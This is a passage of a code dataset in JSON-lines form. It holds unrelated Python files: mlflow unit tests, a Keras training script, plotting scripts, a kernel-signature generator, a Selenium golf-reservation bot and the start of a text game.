stateval=''.join(list(next_state.flatten().astype(str)))\n list_states.append(stateval)\n ep_rewards += reward\n if stateval not in Qdict.keys():\n Qdict[stateval]=np.zeros((9))\n state = next_state\n state = next_state\n epsilon_greedy_rewards.append(ep_rewards)\n for i in range(len(list_actions)) :\n action=list_actions[i]\n state=list_states[i]\n reward=list_rewards[i]\n next_state=list_states[i+1]\n epsilon_greedy_policy.update(state, action, reward,next_state,done)\n t = np.arange(0, num_episodes)\n plt.plot(t, epsilon_greedy_rewards)\n plt.xlabel('Episode Number')\n plt.ylabel('Starting State Q Value (Best Action)')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Self Learning/Model Training.py","file_name":"Model Training.py","file_ext":"py","file_size_in_byte":3322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"613061410","text":"import inspect\nimport time\nimport pytest\nfrom unittest.mock import Mock, call\nfrom unittest import mock\n\n\nimport mlflow\nfrom mlflow.utils import gorilla\nfrom mlflow.tracking.client import MlflowClient\nfrom mlflow.utils.autologging_utils import (\n log_fn_args_as_params,\n wrap_patch,\n resolve_input_example_and_signature,\n batch_metrics_logger,\n BatchMetricsLogger,\n)\n\n# Example function signature we are testing on\n# def fn(arg1, default1=1, default2=2):\n# pass\n\n\ntwo_default_test_args = [\n ([\"arg1\", \"default1\"], {\"default2\": 42}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {}),\n ([\"arg1\", \"default1\", \"default2\"], {}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {}),\n ([\"arg1\"], {\"default1\": 42, \"default2\": 42}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {}),\n (\n [],\n {\"arg1\": 42, \"default1\": 42, \"default2\": 42},\n [\"arg1\", \"default1\", \"default2\"],\n [1, 2],\n {},\n ),\n ([\"user_arg\"], {\"default1\": 42}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {\"default2\": 2}),\n ([\"user_arg\"], {\"default2\": 42}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {\"default1\": 1}),\n ([], {\"arg1\": 42, \"default1\": 42}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {\"default2\": 2}),\n ([\"arg1\", \"default1\"], {}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {\"default2\": 2}),\n ([\"arg1\"], {}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {\"default1\": 1, \"default2\": 2}),\n ([], {\"arg1\": 42}, [\"arg1\", \"default1\", \"default2\"], [1, 2], {\"default1\": 1, \"default2\": 2}),\n]\n\n\n# Test function signature for the following tests\n# def fn_default_default(default1=1, default2=2, default3=3):\n# pass\n\n\nthree_default_test_args = [\n (\n [],\n {},\n [\"default1\", \"default2\", \"default3\"],\n [1, 2, 3],\n {\"default1\": 1, \"default2\": 2, \"default3\": 3},\n ),\n (\n [],\n {\"default2\": 42},\n [\"default1\", \"default2\", \"default3\"],\n [1, 2, 3],\n {\"default1\": 1, \"default3\": 3},\n ),\n]\n\n\n@pytest.fixture\ndef start_run():\n mlflow.start_run()\n yield\n mlflow.end_run()\n\n\ndef dummy_fn(arg1, arg2=\"value2\", arg3=\"value3\"): # pylint: disable=W0613\n pass\n\n\nlog_test_args = [\n ([], {\"arg1\": \"value_x\", \"arg2\": \"value_y\"}, [\"value_x\", \"value_y\", \"value3\"]),\n ([\"value_x\"], {\"arg2\": \"value_y\"}, [\"value_x\", \"value_y\", \"value3\"]),\n ([\"value_x\"], {\"arg3\": \"value_z\"}, [\"value_x\", \"value2\", \"value_z\"]),\n ([\"value_x\", \"value_y\"], {}, [\"value_x\", \"value_y\", \"value3\"]),\n ([\"value_x\", \"value_y\", \"value_z\"], {}, [\"value_x\", \"value_y\", \"value_z\"]),\n (\n [],\n {\"arg1\": \"value_x\", \"arg2\": \"value_y\", \"arg3\": \"value_z\"},\n [\"value_x\", \"value_y\", \"value_z\"],\n ),\n]\n\n\n@pytest.mark.large\n@pytest.mark.parametrize(\"args,kwargs,expected\", log_test_args)\ndef test_log_fn_args_as_params(args, kwargs, expected, start_run): # pylint: disable=W0613\n log_fn_args_as_params(dummy_fn, args, kwargs)\n client = mlflow.tracking.MlflowClient()\n params = client.get_run(mlflow.active_run().info.run_id).data.params\n for arg, value in zip([\"arg1\", \"arg2\", \"arg3\"], expected):\n assert arg in params\n assert params[arg] == value\n\n\n@pytest.mark.large\ndef test_log_fn_args_as_params_ignores_unwanted_parameters(start_run): # pylint: disable=W0613\n args, kwargs, unlogged = (\"arg1\", {\"arg2\": \"value\"}, [\"arg1\", \"arg2\", \"arg3\"])\n log_fn_args_as_params(dummy_fn, args, kwargs, unlogged)\n client = mlflow.tracking.MlflowClient()\n params = client.get_run(mlflow.active_run().info.run_id).data.params\n assert len(params.keys()) == 0\n\n\ndef get_func_attrs(f):\n assert callable(f)\n\n return (f.__name__, f.__doc__, f.__module__, inspect.signature(f))\n\n\n@pytest.mark.large\ndef test_wrap_patch_with_class():\n class Math:\n def add(self, a, b):\n \"\"\"add\"\"\"\n return a + b\n\n def new_add(self, *args, **kwargs):\n \"\"\"new add\"\"\"\n orig = gorilla.get_original_attribute(self, \"add\")\n return 2 * orig(*args, **kwargs)\n\n before = get_func_attrs(Math.add)\n wrap_patch(Math, Math.add.__name__, new_add)\n after = get_func_attrs(Math.add)\n\n assert after == before\n assert Math().add(1, 2) == 6\n\n\n@pytest.mark.large\ndef test_wrap_patch_with_module():\n def new_log_param(key, value):\n \"\"\"new mlflow.log_param\"\"\"\n return (key, value)\n\n before = get_func_attrs(mlflow.log_param)\n wrap_patch(mlflow, mlflow.log_param.__name__, new_log_param)\n after = get_func_attrs(mlflow.log_param)\n\n assert after == before\n assert mlflow.log_param(\"foo\", \"bar\") == (\"foo\", \"bar\")\n\n\n@pytest.fixture()\ndef logger():\n return Mock()\n\n\ndef get_input_example():\n return \"data\"\n\n\ndef infer_model_signature(_):\n return \"signature\"\n\n\ndef test_if_getting_input_example_fails(logger):\n error_msg = \"NoneType has no whatever\"\n\n def throws():\n raise Exception(error_msg)\n\n input_example, signature = resolve_input_example_and_signature(\n throws, infer_model_signature, True, True, logger\n )\n\n assert input_example is None\n assert signature is None\n calls = [\n call(\"Failed to gather input example: \" + error_msg),\n call(\n \"Failed to infer model signature: \"\n + \"could not sample data to infer model signature: \"\n + error_msg\n ),\n ]\n assert logger.warning.has_calls(calls)\n\n\ndef test_if_model_signature_inference_fails(logger):\n error_msg = \"stack overflow\"\n\n def throws(_):\n raise Exception(error_msg)\n\n input_example, signature = resolve_input_example_and_signature(\n get_input_example, throws, True, True, logger\n )\n\n assert input_example == \"data\"\n assert signature is None\n logger.warning.assert_called_with(\"Failed to infer model signature: \" + error_msg)\n\n\ndef test_happy_path_works(logger):\n input_example, signature = resolve_input_example_and_signature(\n get_input_example, infer_model_signature, True, True, logger\n )\n\n assert input_example == \"data\"\n assert signature == \"signature\"\n logger.warning.assert_not_called()\n\n\ndef test_avoids_collecting_input_example_if_not_needed(logger):\n # We create a get_input_example that modifies the value of x\n # If get_input_example was not invoked, x should not have been modified.\n\n x = {\"data\": 0}\n\n def modifies():\n x[\"data\"] = 1\n\n resolve_input_example_and_signature(modifies, infer_model_signature, False, False, logger)\n\n assert x[\"data\"] == 0\n logger.warning.assert_not_called()\n\n\ndef test_avoids_inferring_signature_if_not_needed(logger):\n # We create an infer_model_signature that modifies the value of x\n # If infer_model_signature was not invoked, x should not have been modified.\n\n x = {\"data\": 0}\n\n def modifies(_):\n x[\"data\"] = 1\n\n resolve_input_example_and_signature(get_input_example, modifies, True, False, logger)\n\n assert x[\"data\"] == 0\n logger.warning.assert_not_called()\n\n\ndef test_batch_metrics_logger_logs_all_metrics(start_run,): # pylint: disable=unused-argument\n run_id = mlflow.active_run().info.run_id\n with batch_metrics_logger(run_id) as metrics_logger:\n for i in range(100):\n metrics_logger.record_metrics({hex(i): i}, i)\n\n metrics_on_run = mlflow.tracking.MlflowClient().get_run(run_id).data.metrics\n\n for i in range(100):\n assert hex(i) in metrics_on_run\n assert metrics_on_run[hex(i)] == i\n\n\ndef test_batch_metrics_logger_flush_logs_to_mlflow(start_run): # pylint: disable=unused-argument\n run_id = mlflow.active_run().info.run_id\n\n # Need to patch _should_flush() to return False, so that we can manually flush the logger\n with mock.patch(\n \"mlflow.utils.autologging_utils.BatchMetricsLogger._should_flush\", return_value=False\n ):\n metrics_logger = BatchMetricsLogger(run_id)\n metrics_logger.record_metrics({\"my_metric\": 10}, 5)\n\n # Recorded metrics should not be logged to mlflow run before flushing BatchMetricsLogger\n metrics_on_run = mlflow.tracking.MlflowClient().get_run(run_id).data.metrics\n assert \"my_metric\" not in metrics_on_run\n\n metrics_logger.flush()\n\n # Recorded metric should be logged to mlflow run after flushing BatchMetricsLogger\n metrics_on_run = mlflow.tracking.MlflowClient().get_run(run_id).data.metrics\n assert \"my_metric\" in metrics_on_run\n assert metrics_on_run[\"my_metric\"] == 10\n\n\ndef test_batch_metrics_logger_runs_training_and_logging_in_correct_ratio(\n start_run,\n): # pylint: disable=unused-argument\n with mock.patch.object(MlflowClient, \"log_batch\") as log_batch_mock:\n run_id = mlflow.active_run().info.run_id\n with batch_metrics_logger(run_id) as metrics_logger:\n metrics_logger.record_metrics({\"x\": 1}, step=0) # data doesn't matter\n\n # first metrics should be logged immediately to record a previous timestamp and\n # batch log time\n log_batch_mock.assert_called_once()\n\n metrics_logger.total_log_batch_time = 1\n metrics_logger.total_training_time = 1\n\n log_batch_mock.reset_mock() # resets the 'calls' of this mock\n\n # the above 'training' took 1 second. So with target training-to-logging time ratio of\n # 10:1, 9 more 'training' should happen without sending the batch and then after the\n # 10th training the batch should be sent.\n for i in range(2, 11):\n metrics_logger.record_metrics({\"x\": 1}, step=0)\n log_batch_mock.assert_not_called()\n metrics_logger.total_training_time = i\n\n # at this point, average log batch time is 1, and total training time is 9\n # thus the next record_metrics call should send the batch.\n metrics_logger.record_metrics({\"x\": 1}, step=0)\n log_batch_mock.assert_called_once()\n\n # update log_batch time to reflect the 'mocked' training time\n metrics_logger.total_log_batch_time = 2\n\n log_batch_mock.reset_mock() # reset the recorded calls\n\n for i in range(12, 21):\n metrics_logger.record_metrics({\"x\": 1}, step=0)\n log_batch_mock.assert_not_called()\n metrics_logger.total_training_time = i\n\n metrics_logger.record_metrics({\"x\": 1}, step=0)\n log_batch_mock.assert_called_once()\n\n\ndef test_batch_metrics_logger_chunks_metrics_when_batch_logging(\n start_run,\n): # pylint: disable=unused-argument\n with mock.patch.object(MlflowClient, \"log_batch\") as log_batch_mock:\n run_id = mlflow.active_run().info.run_id\n with batch_metrics_logger(run_id) as metrics_logger:\n metrics_logger.record_metrics({hex(x): x for x in range(5000)}, step=0)\n run_id = mlflow.active_run().info.run_id\n\n for call_idx, call in enumerate(log_batch_mock.call_args_list):\n _, kwargs = call\n\n assert kwargs[\"run_id\"] == run_id\n assert len(kwargs[\"metrics\"]) == 1000\n for metric_idx, metric in enumerate(kwargs[\"metrics\"]):\n assert metric.key == hex(call_idx * 1000 + metric_idx)\n assert metric.value == call_idx * 1000 + metric_idx\n assert metric.step == 0\n\n\ndef test_batch_metrics_logger_records_time_correctly(start_run,): # pylint: disable=unused-argument\n with mock.patch.object(MlflowClient, \"log_batch\", wraps=lambda *args, **kwargs: time.sleep(1)):\n run_id = mlflow.active_run().info.run_id\n with batch_metrics_logger(run_id) as metrics_logger:\n metrics_logger.record_metrics({\"x\": 1}, step=0)\n\n assert metrics_logger.total_log_batch_time >= 1\n\n time.sleep(2)\n\n metrics_logger.record_metrics({\"x\": 1}, step=0)\n\n assert metrics_logger.total_training_time >= 2\n\n\ndef test_batch_metrics_logger_logs_timestamps_as_int_milliseconds(\n start_run,\n): # pylint: disable=unused-argument\n with mock.patch.object(MlflowClient, \"log_batch\") as log_batch_mock, mock.patch(\n \"time.time\", return_value=123.45678901234567890\n ):\n run_id = mlflow.active_run().info.run_id\n with batch_metrics_logger(run_id) as metrics_logger:\n metrics_logger.record_metrics({\"x\": 1}, step=0)\n\n _, kwargs = log_batch_mock.call_args\n\n logged_metric = kwargs[\"metrics\"][0]\n\n assert logged_metric.timestamp == 123456\n\n\ndef test_batch_metrics_logger_continues_if_log_batch_fails(\n start_run,\n): # pylint: disable=unused-argument\n with mock.patch.object(MlflowClient, \"log_batch\") as log_batch_mock:\n log_batch_mock.side_effect = [Exception(\"asdf\"), None]\n\n run_id = mlflow.active_run().info.run_id\n with batch_metrics_logger(run_id) as metrics_logger:\n # this call should fail to record since log_batch raised exception\n metrics_logger.record_metrics({\"x\": 1}, step=0)\n\n metrics_logger.record_metrics({\"y\": 2}, step=1)\n\n # even though the first call to log_batch failed, the BatchMetricsLogger should continue\n # logging subsequent batches\n last_call = log_batch_mock.call_args_list[-1]\n\n _, kwargs = last_call\n\n assert kwargs[\"run_id\"] == run_id\n assert len(kwargs[\"metrics\"]) == 1\n metric = kwargs[\"metrics\"][0]\n assert metric.key == \"y\"\n assert metric.value == 2\n assert metric.step == 1\n","sub_path":"tests/utils/test_autologging_utils.py","file_name":"test_autologging_utils.py","file_ext":"py","file_size_in_byte":13521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"322687784","text":"# ----------------------------------------------------------\r\n# Introdução a Programação de Computadores - IPC\r\n# Universidade do Estado do Amazonas - UEA\r\n# Prof. Jucimar Jr\r\n# Hugo Thadeu Silva Cardoso 1715310013\r\n# Luiz Paulo Machado 1515200542\r\n# Ian Gabriel Costa Machado 1215120276\r\n# André Luis Laborda Neves 1515070006\r\n# Gabriel de Queiroz Souza 1715310044\r\n# João Vitor De Cordeiro B Gonçalves 1515140036\r\n# Rodrigo Duarte de Souza 1115140049\r\n\r\n# --------------------------\r\n\r\n\r\n#ENTRADA DOS DADOS#####\r\nhoras = int(input(' Digite a hora: '))\r\nminutos = int(input(' Digite os minutos: '))\r\n\r\n#PROCESSAMENTO######\r\n\r\n# LETRA A #\r\nhmin = horas * 60\r\nprint('Conversão de horas para minutos =', hmin)\r\n\r\n#LETRA B#\r\ntminutos = hmin + minutos\r\nprint('Total em minutos =', tminutos)\r\n\r\n#LETRA C#\r\nsegundos = tminutos * 60\r\nprint('Horas em segundos =', segundos)\r\n\r\n\r\n","sub_path":"lista1.5/lista1.5_questao25.py","file_name":"lista1.5_questao25.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"559930729","text":"#!/usr/bin/python3\n# hello_tkinter.py by Barron Stone\n# This is an exercise file from Python GUI Devlopment with Tkinter on lynda.com\n\n#python 2 uses Tkinter\nfrom tkinter import *\n\nroot = Tk()\nLabel (root, text = \"HELLO PANDA!\").pack()\nroot.mainloop()\n\n","sub_path":"Python/Lynda Videos/Python GUI Development with Tkinter/Chapter 01/05_hello_tkinter.py","file_name":"05_hello_tkinter.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"363911469","text":"''' To be run in the main computer. It compiles the model and saves it as an .h5 file\n'''\n\nfrom keras import backend as K\nfrom keras.applications.resnet50 import preprocess_input, decode_predictions\nfrom keras.preprocessing import image\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Activation, Dropout, Flatten, Dense, Conv2D, MaxPooling2D\nimport numpy as np\nfrom keras.utils import plot_model\nimport pydot\n\n# Dimensions of our images.\nimg_width, img_height = 150, 150\ntrain_data_dir = 'training_data'\nvalidation_data_dir = 'testing_data'\nnb_train_samples = 500\nnb_validation_samples = 200\nepochs = 25\nbatch_size = 32\n\nif K.image_data_format() == 'channels_first':\n input_shape = (3, img_width, img_height)\nelse:\n input_shape = (img_width, img_height, 3)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=input_shape))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(32, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\nmodel.add(Dense(64))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\n\nmodel.compile(loss='binary_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n\n# This is the augmentation configuration we will use for training\ntrain_datagen = ImageDataGenerator(\n rescale = 1. / 255,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True)\n\n# This is the augmentation configuration we will use for testing: only rescaling\ntest_datagen = ImageDataGenerator(rescale=1. / 255)\n\ntrain_generator = train_datagen.flow_from_directory(\n train_data_dir,\n target_size = (img_width, img_height),\n batch_size = batch_size,\n class_mode = 'binary')\n\nvalidation_generator = test_datagen.flow_from_directory(\n validation_data_dir,\n target_size = (img_width, img_height),\n batch_size = batch_size,\n class_mode = 'binary')\n\nmodel.fit_generator(\n train_generator,\n steps_per_epoch = nb_train_samples // batch_size,\n epochs = epochs,\n validation_data = validation_generator,\n validation_steps = nb_validation_samples // batch_size)\n\nmodel.save('not-laptop-on-mac-25.h5')\nplot_model(model, to_file='model.png')\n","sub_path":"Assignment_2_Deep_Learning/streaming_classifier/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"182246906","text":"#!/usr/bin/python3\nimport json\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nfilename1 = \"out-warmup/128kb-1ke-32th.json\" \nfilename2 = \"out-warmup/128kb-1ke-128th.json\"\nfilename3 = \"out-warmup/128kb-1ke-256th.json\"\nfilename4 = \"out-warmup/128kb-1ke-512th.json\"\nfilename5 = \"out-warmup/128kb-1ke-1024th.json\"\n\nwith open(filename1) as f1:\n data1 = json.load(f1)\nwith open(filename2) as f2:\n data2 = json.load(f2)\nwith open(filename3) as f3:\n data3 = json.load(f3)\nwith open(filename4) as f4:\n data4 = json.load(f4)\nwith open(filename5) as f5:\n data5 = json.load(f5)\n\ndef getData(data):\n meanv= np.array(data['mean'])\n minerr = meanv-np.array(data['min'])\n maxerr = np.array(data['max'])-meanv\n return (meanv, minerr, maxerr)\n\ndef plotData(data, marker, color, ax):\n l = ax.errorbar(data1['nof_blocks'], data[0], yerr=[data[1], data[2]], fmt=color+marker+'--',linewidth=1,elinewidth=1,ecolor=color, capsize=5, capthick=0.5)\n ax.set_xticks(range(1,33,2))\n ax.grid(True, which=\"both\")\n ax.set_xlabel('Nof Blocks')\n ax.set_ylabel('Cycles/Elem')\n return l\n\nfig, ax = plt.subplots(3,2)\nl1 = plotData(getData(data1),'*','r',ax[0,0])\nl2 = plotData(getData(data2),'+','m',ax[1,0])\nl3 = plotData(getData(data3),'x','k',ax[1,1])\nl4 = plotData(getData(data4),'|','b',ax[2,0])\nl5 = plotData(getData(data5),'v','g',ax[2,1])\nax[0, 1].axis('off')\n\n#fig.legend((l1, l2, l3, l4, l5), (\\\n# '128kB, 32 threads',\\\n# '128kB, 128 threadst',\\\n# '128kB, 256 threadst',\\\n# '128kB, 512 threads',\\\n# '128kB, 1024 threads'\\\n# ), 'best')\n\nbox = ax[0,1].get_position()\n#ax[0,0].set_position([box.x0, box.y0, box.width * 0.8, box.height])\nax[0,1].legend((l1, l2, l3 ,l4, l5), (\\\n '128kB, 32 threads',\\\n '128kB, 128 threadst',\\\n '128kB, 256 threadst',\\\n '128kB, 512 threads',\\\n '128kB, 1024 threads'\\\n ),loc='center')\nfig.suptitle('Coallocent sequential walk - multiple blocks')\nplt.xlabel('Nof Blocks')\nplt.ylabel('Cycles/Elem')\nplt.show()\n","sub_path":"experiments/cpu-inter-sequential-walk-multiblock/plotwup.py","file_name":"plotwup.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"336796228","text":"# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE\n\nfrom __future__ import absolute_import\n\nimport os\nimport datetime\nimport time\n\nimport yaml\n\nCURRENT_DIR = os.path.dirname(os.path.realpath(__file__))\n\n\ndef reproducible_datetime():\n\n build_date = datetime.datetime.utcfromtimestamp(\n int(os.environ.get(\"SOURCE_DATE_EPOCH\", time.time()))\n )\n return build_date.isoformat().replace(\"T\", \" AT \")[:22]\n\n\ndef type_to_ctype(typename):\n is_const = False\n if \"Const[\" in typename:\n is_const = True\n typename = typename[len(\"Const[\") : -1]\n count = 0\n while \"List[\" in typename:\n count += 1\n typename = typename[len(\"List[\") : -1]\n typename = typename + \"*\" * count\n if is_const:\n typename = \"const \" + typename\n return typename\n\n\ndef include_kernels_h(specification):\n print(\"Generating include/awkward/kernels.h...\")\n\n with open(\n os.path.join(CURRENT_DIR, \"..\", \"include\", \"awkward\", \"kernels.h\"), \"w\"\n ) as header:\n header.write(\n \"\"\"// AUTO GENERATED ON {0}\n// DO NOT EDIT BY HAND!\n//\n// To regenerate file, run\n//\n// python dev/generate-kernel-signatures.py\n//\n// (It is usually run as part of pip install . or localbuild.py.)\n\n#ifndef AWKWARD_KERNELS_H_\n#define AWKWARD_KERNELS_H_\n\n#include \"awkward/common.h\"\n\nextern \"C\" {{\n\n\"\"\".format(\n reproducible_datetime()\n )\n )\n for spec in specification[\"kernels\"]:\n for childfunc in spec[\"specializations\"]:\n header.write(\" \" * 2 + \"EXPORT_SYMBOL ERROR\\n\")\n header.write(\" \" * 2 + childfunc[\"name\"] + \"(\\n\")\n for i, arg in enumerate(childfunc[\"args\"]):\n header.write(\n \" \" * 4 + type_to_ctype(arg[\"type\"]) + \" \" + arg[\"name\"]\n )\n if i == (len(childfunc[\"args\"]) - 1):\n header.write(\");\\n\")\n else:\n header.write(\",\\n\")\n header.write(\"\\n\")\n header.write(\n \"\"\"}\n\n#endif // AWKWARD_KERNELS_H_\n\"\"\"\n )\n\n print(\"Done with include/awkward/kernels.h.\")\n\n\ntype_to_dtype = {\n \"bool\": \"bool_\",\n \"int8\": \"int8\",\n \"uint8\": \"uint8\",\n \"int16\": \"int16\",\n \"uint16\": \"uint16\",\n \"int32\": \"int32\",\n \"uint32\": \"uint32\",\n \"int64\": \"int64\",\n \"uint64\": \"uint64\",\n \"float\": \"float32\",\n \"double\": \"float64\",\n}\n\n\ndef type_to_pytype(typename, special):\n if \"Const[\" in typename:\n typename = typename[len(\"Const[\") : -1]\n count = 0\n while \"List[\" in typename:\n count += 1\n typename = typename[len(\"List[\") : -1]\n if typename.endswith(\"_t\"):\n typename = typename[:-2]\n if count != 0:\n special.append(type_to_dtype[typename])\n return (\"POINTER(\" * count) + (\"c_\" + typename) + (\")\" * count)\n\n\ndef kernel_signatures_py(specification):\n print(\"Generating src/awkward/_kernel_signatures.py...\")\n\n with open(\n os.path.join(CURRENT_DIR, \"..\", \"src\", \"awkward\", \"_kernel_signatures.py\"),\n \"w\",\n ) as file:\n file.write(\n \"\"\"# AUTO GENERATED ON {0}\n# DO NOT EDIT BY HAND!\n#\n# To regenerate file, run\n#\n# python dev/generate-kernel-signatures.py\n#\n# (It is usually run as part of pip install . or localbuild.py.)\n\n# fmt: off\n\nfrom ctypes import (\n POINTER,\n Structure,\n c_bool,\n c_int8,\n c_uint8,\n c_int16,\n c_uint16,\n c_int32,\n c_uint32,\n c_int64,\n c_uint64,\n c_float,\n c_double,\n c_char_p,\n)\n\nimport numpy as np\n\nfrom numpy import (\n bool_,\n int8,\n uint8,\n int16,\n uint16,\n int32,\n uint32,\n int64,\n uint64,\n float32,\n float64,\n)\n\nclass ERROR(Structure):\n _fields_ = [\n (\"str\", c_char_p),\n (\"filename\", c_char_p),\n (\"id\", c_int64),\n (\"attempt\", c_int64),\n (\"pass_through\", c_bool),\n ]\n\n\ndef by_signature(lib):\n out = {{}}\n\"\"\".format(\n reproducible_datetime()\n )\n )\n\n for spec in specification[\"kernels\"]:\n for childfunc in spec[\"specializations\"]:\n special = [repr(spec[\"name\"])]\n arglist = [\n type_to_pytype(x[\"type\"], special) for x in childfunc[\"args\"]\n ]\n file.write(\n \"\"\"\n f = lib.{0}\n f.argtypes = [{1}]\n f.restype = ERROR\n out[{2}] = f\n\"\"\".format(\n childfunc[\"name\"], \", \".join(arglist), \", \".join(special)\n )\n )\n\n file.write(\n \"\"\"\n return out\n\"\"\"\n )\n\n print(\"Done with src/awkward/_kernel_signatures.py...\")\n\n\nif __name__ == \"__main__\":\n with open(os.path.join(CURRENT_DIR, \"..\", \"kernel-specification.yml\")) as specfile:\n specification = yaml.safe_load(specfile)\n include_kernels_h(specification)\n kernel_signatures_py(specification)\n","sub_path":"dev/generate-kernel-signatures.py","file_name":"generate-kernel-signatures.py","file_ext":"py","file_size_in_byte":4997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"597280122","text":"import time\nimport os\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom time import sleep\n\n############### 예약 제외일자 설정하기 ##################################################\n# (week, 요일) 1=일, 2=월, 3=화, 4=수, 5=목, 6=금, 7=토) \n# 2번째주 수요일을 제외할 경우: except_date = [(2, 4)]\n# 2번째주 수요일과 3번째주 토요일을 제외할 경우: except_date = [(2, 4), (3, 7)]\n\nexcept_date = [] \n#######################################################################################\n\nopen_flag = False\ndef ecolian_action():\n global open_flag\n\n options = webdriver.ChromeOptions()\n options.add_argument('window-size=240,200')\n \n driver = webdriver.Chrome(executable_path='chromedriver_linux64/chromedriver', options=options)\n driver.implicitly_wait(2)\n\n driver.get(url='https://jc.ecolian.or.kr/asp/ecolian/login.asp')\n\n id_input = driver.find_element_by_id('txtId')\n id_input. send_keys('maranta')\n\n pass_input = driver.find_element_by_id('txtPwd')\n pass_input.send_keys('xxxxx')\n\n login_button = driver.find_element_by_id('btnLogin')\n login_button.send_keys(Keys.RETURN)\n \n sleep(1)\n\n reserve_link = driver.find_element_by_xpath('//*[@id=\"navi\"]/li[4]/a/img')\n reserve_link.click()\n\n next_monath_link = driver.find_element_by_xpath('//*[@id=\"contents\"]/p/a[2]/img')\n next_monath_link.click()\n\n for i in range(2, 8):\n except_cnt = 0\n for j in range(1, 8):\n date_xpath = '//*[@id=\"contents\"]/table/tbody/tr[' + str(i) + ']/td[' + str(j) + ']/p'\n try:\n date_link = driver.find_element_by_xpath(date_xpath)\n print(i, j, date_link.text)\n if(date_link.text == '[예약가능]' and (i-1, j) not in except_date):\n date_link.click()\n comfirm_link = driver.find_element_by_xpath('//*[@id=\"rspop_01\"]/div[1]/div[3]/div/a[1]')\n comfirm_link.click()\n time_link = driver.find_element_by_xpath('//*[@id=\"contents\"]/table/tbody/tr[2]/td[2]/span')\n time_link.click()\n alert_box = driver.switch_to_alert()\n alert_box.accept()\n \n duration = 1 # seconds\n freq = 440 # Hz\n os.system('play -nq -t alsa synth {} sine {}'.format(duration, freq))\n open_flag = True\n except:\n except_cnt += 1\n print(i, j, 'No Schedule')\n # except가 7번 발생하면 예약화면이 아니므로(로그인 실패 등) 종료\n if(except_cnt >= 7):\n break\n if(not open_flag):\n driver.close() \n\ni = 0\nstarttime = time.time()\nwhile True:\n i += 1\n if(not open_flag):\n print(\"close\", i, open_flag)\n ecolian_action()\n else:\n print(\"open\", i, open_flag)\n\n time.sleep(5 - ((time.time() - starttime) % 5))\n","sub_path":"ecolian_reservation_jechon_next_month.py","file_name":"ecolian_reservation_jechon_next_month.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"409483230","text":"from Game import Unit\r\nfrom Game import Player\r\nfrom Interfacer.Texty import Texty\r\nfrom Game import BattleHandler\r\nfrom Interfacer.Savvy import Savvy\r\nfrom Game.CommandFactory import CommandFactory\r\n\r\n\r\n \r\n \r\ndef analysisPhase(player):\r\n texty = Texty() \r\n while (True):\r\n enemy = Unit.Unit(\"Enemy\", 0) \r\n player.analyze()\r\n enemy.analyze() \r\n texty.showPlayer(\"Do you wish to fight this enemy?\")\r\n read = texty.readOneKeyFromPlayer() \r\n read = read.lower()\r\n if (read == \"y\"): \r\n texty.showPlayer(\"You approach the enemy and fight!\")\r\n return enemy \r\n else: \r\n texty.showPlayer(\"You bravely flee from your foe!\")\r\n \r\n \r\n \r\n \r\n#MAIN\r\n\r\ntexty = Texty()\r\ntexty.setUp(\"network\")\r\ntexty.getPlayerConnection()\r\ntexty.showPlayer(\"Hello, and welcome to the Enrichment Center. The Device Has Been Modified.\")\r\nplayGame = True\r\ngameOverFlag = False\r\ncf = CommandFactory()\r\nsavvy = Savvy()\r\nflagLoadedMidfight = False\r\nif (savvy.isMidFight()):\r\n texty.showPlayer(\"Do you want to resume the fight?\")\r\n read = texty.readOneKeyFromPlayer()\r\n if (read == \"y\"):\r\n cf.load()\r\n \r\n flagLoadedMidfight = True\r\nif (not flagLoadedMidfight):\r\n texty.showPlayer(\"Do you want to load a game?\")\r\n read = texty.readOneKeyFromPlayer()\r\n if (read == \"y\"):\r\n texty.showPlayer (\"Please write the name of the player\")\r\n read = texty.readOneKeyFromPlayer()\r\n playerchar = savvy.loadPickle(read) \r\n else : playerchar = cf.create(\"newPlayer\", [\"Player\", \"Warrior\"])\r\n \r\nplayerchar = cf.getNextCommand().execute()\r\n\r\n \r\nwhile (playGame):\r\n \r\n if 